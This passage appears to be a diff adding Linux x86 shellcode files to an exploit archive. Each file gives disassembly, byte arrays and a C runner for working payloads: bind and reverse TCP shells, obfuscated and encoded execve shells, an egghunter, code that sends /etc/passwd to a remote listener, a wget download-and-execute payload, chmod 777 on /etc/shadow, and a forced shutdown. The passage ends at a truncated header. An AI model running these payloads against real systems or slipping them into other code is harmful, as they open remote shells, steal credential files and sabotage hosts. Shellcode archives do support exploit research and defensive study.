Title : tcpbindshell (108 bytes)
Date : 15 May 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: b0 66 mov al,0x66
804806a: b3 01 mov bl,0x1
804806c: 51 push ecx
804806d: 6a 06 push 0x6
804806f: 6a 01 push 0x1
8048071: 6a 02 push 0x2
8048073: 89 e1 mov ecx,esp
8048075: cd 80 int 0x80
8048077: 89 c6 mov esi,eax
8048079: b0 66 mov al,0x66
804807b: b3 02 mov bl,0x2
804807d: 52 push edx
804807e: 66 68 7a 69 pushw 0x697a
8048082: 66 53 push bx
8048084: 89 e1 mov ecx,esp
8048086: 6a 10 push 0x10
8048088: 51 push ecx
8048089: 56 push esi
804808a: 89 e1 mov ecx,esp
804808c: cd 80 int 0x80
804808e: b0 66 mov al,0x66
8048090: b3 04 mov bl,0x4
8048092: 6a 01 push 0x1
8048094: 56 push esi
8048095: 89 e1 mov ecx,esp
8048097: cd 80 int 0x80
8048099: b0 66 mov al,0x66
804809b: b3 05 mov bl,0x5
804809d: 52 push edx
804809e: 52 push edx
804809f: 56 push esi
80480a0: 89 e1 mov ecx,esp
80480a2: cd 80 int 0x80
80480a4: 89 c3 mov ebx,eax
80480a6: 31 c9 xor ecx,ecx
80480a8: b1 03 mov cl,0x3
080480aa <dupfd>:
80480aa: fe c9 dec cl
80480ac: b0 3f mov al,0x3f
80480ae: cd 80 int 0x80
80480b0: 75 f8 jne 80480aa
80480b2: 31 c0 xor eax,eax
80480b4: 52 push edx
80480b5: 68 6e 2f 73 68 push 0x68732f6e
80480ba: 68 2f 2f 62 69 push 0x69622f2f
80480bf: 89 e3 mov ebx,esp
80480c1: 52 push edx
80480c2: 53 push ebx
80480c3: 89 e1 mov ecx,esp
80480c5: 52 push edx
80480c6: 89 e2 mov edx,esp
80480c8: b0 0b mov al,0xb
80480ca: cd 80 int 0x80
*/
#include <stdio.h>
/*
Port High/Low bytes
Current port 31337 (7a69)
*/
#define PORTHL "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66"
"\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89"
"\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52"
"\x66\x68"PORTHL"\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04"
"\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3"
"\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"
"\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}

69
shellcodes/linux_x86/43743.c Normal file
View file

@ -0,0 +1,69 @@
/*
In The Name of G0D
Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit()
Size : 83 Bytes
fun for routers ;)
Author : By Hamid Zamani (aka HAMIDx9)
Member of ^^Ashiyane Digital Security Team^^
Disassembly of section .text:
08048054 <_start>:
8048054: 31 c0 xor %eax,%eax
8048056: 50 push %eax
8048057: 68 77 61 72 64 push $0x64726177
804805c: 68 5f 66 6f 72 push $0x726f665f
8048061: 68 34 2f 69 70 push $0x70692f34
8048066: 68 2f 69 70 76 push $0x7670692f
804806b: 68 2f 6e 65 74 push $0x74656e2f
8048070: 68 73 79 73 2f push $0x2f737973
8048075: 68 72 6f 63 2f push $0x2f636f72
804807a: 66 68 2f 70 pushw $0x702f
804807e: 89 e3 mov %esp,%ebx
8048080: 31 c9 xor %ecx,%ecx
8048082: b1 01 mov $0x1,%cl
8048084: b0 05 mov $0x5,%al
8048086: cd 80 int $0x80
8048088: 89 c3 mov %eax,%ebx
804808a: 31 c9 xor %ecx,%ecx
804808c: 51 push %ecx
804808d: 6a 30 push $0x30
804808f: 89 e1 mov %esp,%ecx
8048091: 31 d2 xor %edx,%edx
8048093: b2 01 mov $0x1,%dl
8048095: b0 04 mov $0x4,%al
8048097: cd 80 int $0x80
8048099: 31 c0 xor %eax,%eax
804809b: 83 c0 06 add $0x6,%eax
804809e: cd 80 int $0x80
80480a0: 31 c0 xor %eax,%eax
80480a2: 40 inc %eax
80480a3: 31 db xor %ebx,%ebx
80480a5: cd 80 int $0x80
*/
#include <stdio.h>
int main(int argc,char **argv)
{
char shellcode[] = "\x31\xc0\x50\x68\x77\x61\x72\x64\x68"
"\x5f\x66\x6f\x72\x68\x34\x2f\x69\x70"
"\x68\x2f\x69\x70\x76\x68\x2f\x6e\x65"
"\x74\x68\x73\x79\x73\x2f\x68\x72\x6f"
"\x63\x2f\x66\x68\x2f\x70\x89\xe3\x31"
"\xc9\xb1\x01\xb0\x05\xcd\x80\x89\xc3"
"\x31\xc9\x51\x6a\x30\x89\xe1\x31\xd2"
"\xb2\x01\xb0\x04\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80";
printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

59
shellcodes/linux_x86/43744.c Normal file
View file

@ -0,0 +1,59 @@
/*
Title : egghunter shellcode
: hunter (30 bytes), marker (8 bytes), shellcode (28 bytes)
Date : 28 May 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
Comments:
Using sigaction system call for hunter code for robust operation.
Based on paper 'Safely Searching Process Virtual Address Space'.
This is a must read paper, instructive and inspiring, found here:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
see section 3.1.3 sigaction(2), page 13.
To build:
gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
* Marker code must be executable, currently:
* /x90 nop
* /x50 push eax
*/
#define MARKER "\x90\x50"
char hunter[] =
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1"
"\xb8"MARKER""MARKER"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
char marker[] = MARKER;
char shellcode[] =
"\x31\xc0\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
int
main(void)
{
int i=0, nmarkers = 4, markerlen = sizeof(marker)-1;
/*
* Setup area of memory for testing,
* place marker and shellcode into area.
*/
char *egg = malloc(128);
memcpy(egg+(markerlen*nmarkers), shellcode, sizeof(shellcode)-1);
do {
memcpy(egg+i, marker, markerlen);
i += markerlen;
} while(i != (markerlen * nmarkers));
/*
* Run hunter to search for marker and jump to shellcode
*/
int (*ret)() = (int(*)())hunter;
ret();
free(egg);
return 0;
}

41
shellcodes/linux_x86/43745.c Normal file
View file

@ -0,0 +1,41 @@
/*
Title : Obfuscated execve /bin/sh (30 bytes)
Date : 3rd July 2013
Author : Russell Willis <codinguy@gmail.com>
System : Linux/x86 (SMP Debian 3.2.41-2 i686)
To build:
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
00000000 31C9 xor ecx,ecx
00000002 F7E9 imul ecx
00000004 51 push ecx
00000005 040B add al,0xb
00000007 EB08 jmp short 0x11
00000009 5E pop esi
0000000A 87E6 xchg esp,esi
0000000C 99 cdq
0000000D 87DC xchg ebx,esp
0000000F CD80 int 0x80
00000011 E8F3FFFFFF call dword 0x9
00000016 2F das
00000017 62696E bound ebp,[ecx+0x6e]
0000001A 2F das
0000001B 2F das
0000001C 7368 jnc 0x86
*/
#include <stdio.h>
unsigned char code[] = \
"\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80"
"\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}

90
shellcodes/linux_x86/43746.c Normal file
View file

@ -0,0 +1,90 @@
/*
Title : Obfuscated tcp bind shell (112 bytes)
Date : 3 July 2013
Author : Russell Willis <codinguy@gmail.com>
System : Linux/x86 (SMP Debian 3.2.41-2 i686)
To build:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
00000000 D9EE fldz
00000002 9BD97424F4 fstenv [esp-0xc]
00000007 5D pop ebp
00000008 8D6D59 lea ebp,[ebp+0x59]
0000000B 31DB xor ebx,ebx
0000000D F7EB imul ebx
0000000F FEC3 inc bl
00000011 51 push ecx
00000012 6A06 push byte +0x6
00000014 6A01 push byte +0x1
00000016 6A02 push byte +0x2
00000018 FFD5 call ebp
0000001A 89C6 mov esi,eax
0000001C FEC3 inc bl
0000001E 52 push edx
0000001F 66687A69 push word 0x697a
00000023 6653 push bx
00000025 89E1 mov ecx,esp
00000027 6A10 push byte +0x10
00000029 51 push ecx
0000002A 56 push esi
0000002B FFD5 call ebp
0000002D B304 mov bl,0x4
0000002F 6A01 push byte +0x1
00000031 56 push esi
00000032 FFD5 call ebp
00000034 B305 mov bl,0x5
00000036 52 push edx
00000037 52 push edx
00000038 56 push esi
00000039 FFD5 call ebp
0000003B 89C3 mov ebx,eax
0000003D 31C9 xor ecx,ecx
0000003F B103 mov cl,0x3
00000041 FEC9 dec cl
00000043 B03F mov al,0x3f
00000045 CD80 int 0x80
00000047 75F8 jnz 0x41
00000049 31DB xor ebx,ebx
0000004B F7E3 mul ebx
0000004D 51 push ecx
0000004E EB13 jmp short 0x63
00000050 5E pop esi
00000051 87E6 xchg esp,esi
00000053 87DC xchg ebx,esp
00000055 B00B mov al,0xb
00000057 CD80 int 0x80
00000059 5F pop edi
0000005A 6A66 push byte +0x66
0000005C 58 pop eax
0000005D 89E1 mov ecx,esp
0000005F CD80 int 0x80
00000061 57 push edi
00000062 C3 ret
00000063 E8E8FFFFFF call dword 0x50
00000068 2F das
00000069 62696E bound ebp,[ecx+0x6e]
0000006C 2F das
0000006D 2F das
0000006E 7368 jnc 0xd8
*/
#include <stdio.h>
unsigned char code[] = \
"\xd9\xee\x9b\xd9\x74\x24\xf4\x5d\x8d\x6d\x59\x31\xdb\xf7"
"\xeb\xfe\xc3\x51\x6a\x06\x6a\x01\x6a\x02\xff\xd5\x89\xc6"
"\xfe\xc3\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51"
"\x56\xff\xd5\xb3\x04\x6a\x01\x56\xff\xd5\xb3\x05\x52\x52"
"\x56\xff\xd5\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd"
"\x80\x75\xf8\x31\xdb\xf7\xe3\x51\xeb\x13\x5e\x87\xe6\x87"
"\xdc\xb0\x0b\xcd\x80\x5f\x6a\x66\x58\x89\xe1\xcd\x80\x57"
"\xc3\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}

98
shellcodes/linux_x86/43747.c Normal file
View file

@ -0,0 +1,98 @@
/*
; Author: Daniel Sauder
; Website: http://govolution.wordpress.com/about
; License http://creativecommons.org/licenses/by-sa/3.0/
; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345.
; The file can be recieved using netcat:
; $ nc -l 127.1.1.1 12345
section .text
global _start
_start:
; socket
push BYTE 0x66 ; socketcall 102
pop eax
xor ebx, ebx
inc ebx
xor edx, edx
push edx
push BYTE 0x1
push BYTE 0x2
mov ecx, esp
int 0x80
mov esi, eax
; connect
push BYTE 0x66
pop eax
inc ebx
push DWORD 0x0101017f ;127.1.1.1
push WORD 0x3930 ; Port 12345
push WORD bx
mov ecx, esp
push BYTE 16
push ecx
push esi
mov ecx, esp
inc ebx
int 0x80
; dup2
mov esi, eax
push BYTE 0x1
pop ecx
mov BYTE al, 0x3F
int 0x80
;read the file
jmp short call_shellcode
shellcode:
push 0x5
pop eax
pop ebx
xor ecx,ecx
int 0x80
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
xor edx,edx
mov dh,0xff
mov dl,0xff
int 0x80
mov edx,eax
push 0x4
pop eax
mov bl, 0x1
int 0x80
push 0x1
pop eax
inc ebx
int 0x80
call_shellcode:
call shellcode
message db "/etc/passwd"
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

95
shellcodes/linux_x86/43748.c Normal file
View file

@ -0,0 +1,95 @@
/*
; Filename: downloadexec.nasm
; Author: Daniel Sauder
; Website: http://govolution.wordpress.com/
; Tested on: Ubuntu 12.04 / 32Bit
; License: http://creativecommons.org/licenses/by-sa/3.0/
; Shellcode:
; - download 192.168.2.222/x with wget
; - chmod x
; - execute x
; - x is an executable
; - length 108 bytes
global _start
section .text
_start:
;fork
xor eax,eax
mov al,0x2
int 0x80
xor ebx,ebx
cmp eax,ebx
jz child
;wait(NULL)
xor eax,eax
mov al,0x7
int 0x80
;chmod x
xor ecx,ecx
xor eax, eax
push eax
mov al, 0xf
push 0x78
mov ebx, esp
xor ecx, ecx
mov cx, 0x1ff
int 0x80
;exec x
xor eax, eax
push eax
push 0x78
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
child:
;download 192.168.2.222//x with wget
push 0xb
pop eax
cdq
push edx
push 0x782f2f32 ;2//x avoid null byte
push 0x32322e32 ;22.2
push 0x2e383631 ;.861
push 0x2e323931 ;.291
mov ecx,esp
push edx
push 0x74 ;t
push 0x6567772f ;egw/
push 0x6e69622f ;nib/
push 0x7273752f ;rsu/
mov ebx,esp
push edx
push ecx
push ebx
mov ecx,esp
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\x68\x32\x2f\x2f\x78\x68\x32\x2e\x32\x32\x68\x31\x36\x38\x2e\x68\x31\x39\x32\x2e\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

41
shellcodes/linux_x86/43749.asm Normal file
View file

@ -0,0 +1,41 @@
;Description: JMP-CALL-POP execve shell (52 bytes)
;Shellcode: \xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
global _start
section .text
_start:
jmp short here
me:
pop esi
mov edi,esi
xor eax,eax
push eax
mov edx,esp
push eax
add esp,3
lea esi,[esi +4]
xor eax,[esi]
push eax
xor eax,eax
xor eax,[edi]
push eax
mov ebx,esp
xor eax,eax
push eax
lea edi,[ebx]
push edi
mov ecx,esp
mov al,0xb
int 0x80
here:
call me
path db "//bin/sh"

52
shellcodes/linux_x86/43750.asm Normal file
View file

@ -0,0 +1,52 @@
;Description: Copy /etc/passwd to /tmp/outfile (97 bytes)
;Shellcode: \x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd\x80
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
global _start
section .text
_start:
xor eax,eax
mov al,0x5
xor ecx,ecx
push ecx
push 0x64777373
push 0x61702f63
push 0x74652f2f
lea ebx,[esp +1]
int 0x80
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
push WORD 0xffff
pop edx
int 0x80
mov esi,eax
push 0x5
pop eax
xor ecx,ecx
push ecx
push 0x656c6966
push 0x74756f2f
push 0x706d742f
mov ebx,esp
mov cl,0102o
push WORD 0644o
pop edx
int 0x80
mov ebx,eax
push 0x4
pop eax
mov ecx,edi
mov edx,esi
int 0x80
xor eax,eax
xor ebx,ebx
mov al,0x1
mov bl,0x5
int 0x80

75
shellcodes/linux_x86/43751.asm Normal file
View file

@ -0,0 +1,75 @@
;author: Shihao Songss3695@drexel.edu
;decoding will be divided into two parts
;First, shift right to get the original shellcode with prefix "0xAA"
;Second, delete all the "0xAA" prefix and reformat the shellcode
; shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
; encode = ""
;
; for x in bytearray(shellcode) :
; if x < 128:
; x=x<<1
; encode += '0xAA,'
; encode += '0x'
; encode += '%02x,'%x
;
; print encode
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi ;now esi contains the address of encoded shellcode
mov edi, esi ;this is for formatting
decode:
mov bl, byte [esi]
xor bl, 0xBB ;bl is for testing end
jz formatting ;First step is done
mov cl, byte [esi]
xor cl, 0XAA
jz shift_decode
inc esi
jmp short decode
shift_decode:
mov dl, byte [esi + 1]
shr dl,1 ;shift next instruction
mov byte [esi + 1], dl
inc esi
jmp short decode
formatting:
mov eax, edi
mov bl, byte [eax]
xor bl, 0xBB ;now formatting complete
jz encoded ;starts to execute
format:
mov bl, byte [eax] ;bl is for testing end
mov cl, byte [eax] ;cl is for testing prefix
xor cl, 0xAA
jnz Next_Cycle
Cycle:
mov dl, byte [eax]
xor dl, 0xBB
jz Next_Cycle ;This cycle ends here
mov dl, byte [eax + 1]
mov byte [eax], dl
inc eax
jmp short Cycle
Next_Cycle:
inc edi
jmp short formatting
call_shellcode:
call decoder
encoded: db 0xAA,0x62,0xc0,0xAA,0xa0,0xAA,0xd0,0xAA,0x5e,0xAA,0x5e,0xAA,0xe6,0xAA,0xd0,0xAA,0xd0,0xAA,0x5e,0xAA,0xc4,0xAA,0xd2,0xAA,0xdc,0x89,0xe3,0xAA,0xa0,0x89,0xe2,0xAA,0xa6,0x89,0xe1,0xb0,0xAA,0x16,0xcd,0x80,0xBB

15
shellcodes/linux_x86/43752.asm Normal file
View file

@ -0,0 +1,15 @@
;Description: JMP-FSTENV execve shell (67 bytes)
;Shellcode: \xd9\xee\xeb\x34\xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x9b\xd9\x74\x24\xf4\x59\x8d\x41\x04\xff\xe0
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
global main
section .text
main:
fldz
jmp short here
message: db 0xeb,0x25,0x5e,0x89,0xf7,0x31,0xc0,0x50,0x89,0xe2,0x50,0x83,0xc4,0x03,0x8d,0x76,0x04,0x33,0x06,0x50,0x31,0xc0,0x33,0x07,0x50,0x89,0xe3,0x31,0xc0,0x50,0x8d,0x3b,0x57,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0xe8,0xd6,0xff,0xff,0xff,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
here: fstenv [esp-0xc]
pop ecx
lea eax,[ecx+4]
jmp eax

48
shellcodes/linux_x86/43753.c Normal file
View file

@ -0,0 +1,48 @@
/*
; Title: chmod 0777 /etc/shadow (a bit obfuscated) Shellcode - 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
mov ebx, eax
xor eax, ebx
push dword eax
mov esi, 0x563a1f3e
add esi, 0x21354523
mov dword [esp-4], esi
mov dword [esp-8], 0x68732f2f
mov dword [esp-12], 0x6374652f
sub esp, 12
mov ebx,esp
push word 0x1ff
pop cx
mov al,0xf
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";
int
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}

54
shellcodes/linux_x86/43754.c Normal file
View file

@ -0,0 +1,54 @@
/*
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 d2 xor edx,edx
8048064: 50 push eax
8048065: 66 68 2d 68 pushw 0x682d
8048069: 89 e7 mov edi,esp
804806b: 50 push eax
804806c: 6a 6e push 0x6e
804806e: 66 c7 44 24 01 6f 77 mov WORD PTR [esp+0x1],0x776f
8048075: 89 e7 mov edi,esp
8048077: 50 push eax
8048078: 68 64 6f 77 6e push 0x6e776f64
804807d: 68 73 68 75 74 push 0x74756873
8048082: 68 6e 2f 2f 2f push 0x2f2f2f6e
8048087: 68 2f 73 62 69 push 0x6962732f
804808c: 89 e3 mov ebx,esp
804808e: 52 push edx
804808f: 56 push esi
8048090: 57 push edi
8048091: 53 push ebx
8048092: 89 e1 mov ecx,esp
8048094: b0 0b mov al,0xb
8048096: cd 80 int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\x31\xc0\x31\xd2\x50\x66\x68\x2d"
"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
"\x44\x24\x01\x6f\x77\x89\xe7\x50"
"\x68\x64\x6f\x77\x6e\x68\x73\x68"
"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
"\x2f\x73\x62\x69\x89\xe3\x52\x56"
"\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
int
main() {
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}

75
shellcodes/linux_x86/43755.c Normal file
View file

@ -0,0 +1,75 @@
/*
* Title: Shell Bind TCP Shellcode Port 1337 - 89 bytes
* Platform: Linux/x86
* Date: 2014-07-13
* Author: Julien Ahrens (@MrTuxracer)
* Website: http://www.rcesecurity.com
*
* Disassembly of section .text:
* 00000000 <_start>:
* 0: 6a 66 push 0x66
* 2: 58 pop eax
* 3: 6a 01 push 0x1
* 5: 5b pop ebx
* 6: 31 f6 xor esi,esi
* 8: 56 push esi
* 9: 53 push ebx
* a: 6a 02 push 0x2
* c: 89 e1 mov ecx,esp
* e: cd 80 int 0x80
* 10: 5f pop edi
* 11: 97 xchg edi,eax
* 12: 93 xchg ebx,eax
* 13: b0 66 mov al,0x66
* 15: 56 push esi
* 16: 66 68 05 39 pushw 0x3905
* 1a: 66 53 push bx
* 1c: 89 e1 mov ecx,esp
* 1e: 6a 10 push 0x10
* 20: 51 push ecx
* 21: 57 push edi
* 22: 89 e1 mov ecx,esp
* 24: cd 80 int 0x80
* 26: b0 66 mov al,0x66
* 28: b3 04 mov bl,0x4
* 2a: 56 push esi
* 2b: 57 push edi
* 2c: 89 e1 mov ecx,esp
* 2e: cd 80 int 0x80
* 30: b0 66 mov al,0x66
* 32: 43 inc ebx
* 33: 56 push esi
* 34: 56 push esi
* 35: 57 push edi
* 36: 89 e1 mov ecx,esp
* 38: cd 80 int 0x80
* 3a: 59 pop ecx
* 3b: 59 pop ecx
* 3c: b1 02 mov cl,0x2
* 3e: 93 xchg ebx,eax
*
* 0000003f <loop>:
* 3f: b0 3f mov al,0x3f
* 41: cd 80 int 0x80
* 43: 49 dec ecx
* 44: 79 f9 jns 3f <loop>
* 46: b0 0b mov al,0xb
* 48: 68 2f 2f 73 68 push 0x68732f2f
* 4d: 68 2f 62 69 6e push 0x6e69622f
* 52: 89 e3 mov ebx,esp
* 54: 41 inc ecx
* 55: 89 ca mov edx,ecx
* 57: cd 80 int 0x80
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

62
shellcodes/linux_x86/43756.c Normal file
View file

@ -0,0 +1,62 @@
/*
* Title: Shell Reverse TCP Shellcode - 74 bytes
* Platform: Linux/x86
* Date: 2014-07-25
* Author: Julien Ahrens (@MrTuxracer)
* Website: http://www.rcesecurity.com
*
* Disassembly of section .text:
* 00000000 <_start>:
* 0: 6a 66 push 0x66
* 2: 58 pop eax
* 3: 6a 01 push 0x1
* 5: 5b pop ebx
* 6: 31 d2 xor edx,edx
* 8: 52 push edx
* 9: 53 push ebx
* a: 6a 02 push 0x2
* c: 89 e1 mov ecx,esp
* e: cd 80 int 0x80
* 10: 92 xchg edx,eax
* 11: b0 66 mov al,0x66
* 13: 68 7f 01 01 01 push 0x101017f <ip: 127.1.1.1
* 18: 66 68 05 39 pushw 0x3905 <port: 1337
* 1c: 43 inc ebx
* 1d: 66 53 push bx
* 1f: 89 e1 mov ecx,esp
* 21: 6a 10 push 0x10
* 23: 51 push ecx
* 24: 52 push edx
* 25: 89 e1 mov ecx,esp
* 27: 43 inc ebx
* 28: cd 80 int 0x80
* 2a: 6a 02 push 0x2
* 2c: 59 pop ecx
* 2d: 87 da xchg edx,ebx
*
* 0000002f <loop>:
* 2f: b0 3f mov al,0x3f
* 31: cd 80 int 0x80
* 33: 49 dec ecx
* 34: 79 f9 jns 2f <loop>
* 36: b0 0b mov al,0xb
* 38: 41 inc ecx
* 39: 89 ca mov edx,ecx
* 3b: 52 push edx
* 3c: 68 2f 2f 73 68 push 0x68732f2f
* 41: 68 2f 62 69 6e push 0x6e69622f
* 46: 89 e3 mov ebx,esp
* 48: cd 80 int 0x80
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

51
shellcodes/linux_x86/43757.c Normal file
View file

@ -0,0 +1,51 @@
# Title: Shellcode Linux x86 [54Bytes] Run /usr/bin/python | setreuid(),execve()
# Date: 8/5/2014
# Author: Ali Razmjoo
